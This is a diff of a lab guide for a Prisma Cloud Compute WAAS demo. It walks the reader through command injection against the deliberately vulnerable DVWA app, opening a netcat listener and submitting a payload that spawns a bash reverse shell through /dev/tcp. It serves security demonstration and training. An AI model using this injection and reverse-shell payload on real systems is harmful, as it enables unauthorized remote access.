kyle9021/panw-partner-wiki/contents/labs/Prisma_Cloud_Compute_Command_Injection_WAAS_Demo.md

 ### (Option 1) Locally from vm to laptop terminal ---easiest/recommended way

-* To run the attack, open a terminal window on your local machine.
+* To run the attack, open a terminal window on your local (not the VM) machine.
 Explain this is the attackers terminal.
 In terminal enter (linux devices) `nc -lvp 5678` (macOS) `netcat -lvp 5678`.
 This will open a listening port on port 5678.
 Nothing too exiting to see yet.
 * Then retrieve the Internal IP address of the local machine.
 * Go back to the DVWA app and enter this command on the command injection screen. `127.0.0.1 & bash -c 'bash -i >& /dev/tcp/<YOUR_INTERNAL_IP_ADDRESS>/5678 0>&1'`
 * Check the terminal window where you entered `nc -lvp 5678` you should now have a reverse shell into the container.